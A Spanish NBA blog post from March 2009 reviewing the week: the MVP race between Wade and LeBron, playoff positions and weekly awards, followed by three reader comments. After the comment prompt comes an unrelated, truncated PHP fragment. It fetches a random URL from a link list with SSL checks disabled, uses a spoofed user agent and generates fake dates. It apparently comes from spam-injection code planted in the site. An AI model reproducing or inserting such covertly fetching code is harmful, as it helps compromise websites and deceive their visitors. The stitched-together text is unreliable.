Informe Semanal TJ (Semana 20)

16 de March de 2009 por TheDeerHunter

TheDeerHunter & MagicJohnson32

La semana ha estado marcada por la espectacular batalla entre los candidatos a MVP y por la irregularidad padecida por la gran mayoría de equipos, sobre todo los del Oeste, definitivamente bastante menos salvaje de lo que era.

ON FIRE

El On Fire de la semana tiene nombres propios. Wade y Lebron, con el permiso de Kobe. Ambos se combinan para, día sí y día también, ofrecernos actuaciones que rozan lo sobrenatural, para provecho y disfrute de sus respectivos equipos. El increíble estado de forma de Flash ha puesto en duda el hasta hace poco casi seguro primer MVP del “Elegido”. LeBron, por su parte, ha respondido rabiosamente, con la motivación añadida de conseguir el primer puesto de la regular. A su alcance tiene tanto una cosa como la otra. Los grandes beneficiados de esta batalla seremos, sin lugar dudas, los espectadores.

Con todo, el equipo on fire de la liga es en este momento Atlanta que precisamente esta semana fue capaz de detener la larguísima racha de los Jazz y que de forma inesperada ha encontrado en Maurice Evans un valioso recambio frente a la ausencia de Marvin Williams. Con él de titular sólo han perdido una vez esta temporada. Adicionalmente esta semana han superado el balance de la temporada pasada y no sólo han resistido el arreón de Miami por la 4ª plaza ganando a rivales durísimos sino que han logrado aumentar su ventaja. Definitivamente nuestro pronóstico ha resultado ser un completo error.

Los Sixers también han estado fantásticos, pasando a Detroit en la tabla. Desgraciadamente para sus aficionados la mala suerte se ceba con ellos y han de ver cómo los Celtics amenazan con caer al 3er puesto de Este. Mal cruce de primera ronda tendrían ahora mismo como premio.

Las cosas también marchan muy bien en Orlando. Tanto que la hipotética ventaja de campo en semifinales está más al alcance que nunca. Mal choque sería ese para cualquiera.

En el Oeste, los grandes beneficiados de los últimos acontecimientos han sido los Lakers. La semana comenzó terroríficamente mal en Portland, pero las grandes victorias en Houston, San Antonio y ayer frente a Dallas, unidas a los resultados de casi todos sus rivales les hacen afrontar el final de la regular con mucho optimismo. Ahora sólo falta que Bynum pueda recuperarse, como el propio jugador se atrevió anoche a vaticinar, y el quedar primeros será tan sólo una simple formalidad.

AL TRAN-TRAN

Podríamos incluir en esta categoría a todos los equipos de Playoffs del Oeste. El tran-tran por antonomasia lo hace siempre San Antonio durante estas fechas. Están más que acostumbrados y poco les importa quedar más arriba. El resto debería pelear por evitarles a ellos y a Lakers en primera ronda. Sin embargo, nadie ha logrado sacar un buen balance esta semana. Luego vendrán las prisas… y los lamentos.

En el Este, destacamos a los Knicks en positivo y a Detroit en negativo. Sin embargo, ambos tienen que afinar bastante antes de lograr sus objetivos inmediatos. Al fin y al cabo, una 7ª plaza para Detroit sería decepción tremenda y una 8ª para New York un éxito increíble. Antagónicos puntos de vista para hablar casi de lo mismo.

EL BORDE DEL ABISMO

El panorama de unas semifinales de conferencia contra Orlando y una final contra Cleveland, ambas rondas con desventaja campo, es terrible para cualquiera por mucho que seas Boston Celtics, el campeón vigente. Marbury y Moore todavía no suponen un salto cualitativo y la paliza física que se están dando los pilares sanos de este equipo también es digna de tener en cuenta. Situación “alarmante” aunque no crítica.

Chicago, Milwaukee, New Jersey, Charlotte o Indiana se mantienen en el filo de la navaja. Lamentable semana para todos con lo que se están jugando. La difusa frontera entre el éxito y el fracaso está en esa insignificante 8ª plaza.

EL POZO

Ha sido la semana de la confirmación de muchos equipos prematuramente fuera de playoffs. La mayoría de ellos no esperaba ningún otro resultado pero, a pesar de todo, muy pocos han logrado escapar a la quema del fracaso más infame. Sólo Timberwolves y Thunder parecen disfrutar de un halo de progreso, quizás más por el relativo “crescendo” de su temporada que por la mejora real experimentada.

Del resto, lo más lamentable es el caso de los Clippers. Logran reunir al equipo cuando ya no tienen nada que jugarse. Malos sustos les van a dar a más de uno lo que queda de temporada.

Ni Toronto ni Phoenix tienen confirmada su presencia final en esta categoría. Lo irónico es que con trayectorias tan distintas ambos se encuentran en la misma situación.

PREMIOS SEMANALES

MVP: Qué difícil se nos hace elegir… Wade ha promediado esta semana 37 puntos, 7.8 asistencias, 6 rebotes, 3.3 robos y 1.5 tapones. LeBron se ha acercado al triple doble con 34 puntos, 10.8 asistencias, 8.8 rebotes, 2.8 robos y 2.8 tapones. Y ambos lo han hecho en cuatro partidos, de los cuales los Heat ganaron tres y los Cavs, los cuatro. Este detalle y el mal partido de Wade de anoche en la derrota en Philadelphia dejan a James como MVP de la semana.

El rookie: Los novatos más destacados han sido Marc Gasol, con 12 puntos, 9 rebotes, 3 asistencias y 1.3 tapones de media, Jason Thompson con 13.3 puntos, 8.7 rebotes, 2.3 asistencias y 2 tapones, Kevin Love con 15.8 puntos, 8.3 rebotes y 2 asistencias, y, entre tanto interior, se cuela Westbrook con 18.3 puntos, 4.7 rebotes y 4 asistencias.

La sorpresa: En dos partidos como titular, Renaldo Balkman ha logrado 18 puntos, 12.5 rebotes, 2 asistencias, 1.5 tapones y 1 robo de media. Los 22 puntos que anotó ante los Clippers suponen su mejor marca como profesional.

La decepción: Sin Garnett, era de esperar que Paul Pierce se echase el equipo a la espalda. El MVP de las pasadas Finales no ha estado a la altura y se ha quedado en 16 puntos con apenas un 40% de acierto, 6.3 rebotes y 2.7 asistencias. Pierce no ha anotado más de 17 puntos en ninguno de los últimos cuatro encuentros y los Celtics se han resentido con tres derrotas.

Comenta

3 comentarios a esta entrada

  1. Dantley dice:
    #1

    Pues pronto han empezado el tran-tran algunos, a ver si se van a dar algún susto.

    Detroit me está decepcionando. A Stuckey le falta todavía madurez, aunque es muy bueno, y Iverson como ya predijimos algunos, ha sido negativo.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    En cuanto a sueldo, lo opuesto a profesional sería amateur (pronunciado amateur). ¿y en cuanto a ser un vaina?

      Citar

  3. kantonyo dice:
    #3

    Es curiosa la trayectoria del ingles Mensah-Bonsu.

    Demostró gran nivel en la NCAA donde fue elegido en el mejor quinteto de la division Atlantic-10, y fue la estrella de una sorprendente Universidad de George Washington, ganando un torneo y dos seasons de esa conferencia.

    A pesar de ello no fue elegido en el Draft de 2006. Fue contratado por Dallas, pero jugo toda la temporada en la liga de desarrollo donde fue elegido MVP del AllStar. Lo que le valió para ser repescado por los Mavs jugando el final de la temporada.

    Al final de la temporada pasada fue fichado por el Granada en el ultimo partido que decidia si bajaban a la liga LEB, y se salió, siendo la estrella del partido. Esto hizo que el DKV se fijará en el para esta temporada, y estuvo apunto de ganar el concurso de mates de la ACB. Una lesión provocó que tuviera problemas con la directiva del equipo de Badalona y se marchó…

    Y ahora Raptors lo repesca, y está teniendo actuaciones bastante decedentes. A mi parecer puede ser interesante su aportación. Último partido: 21 puntos y 8 rebotes en solo 22 minutos….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>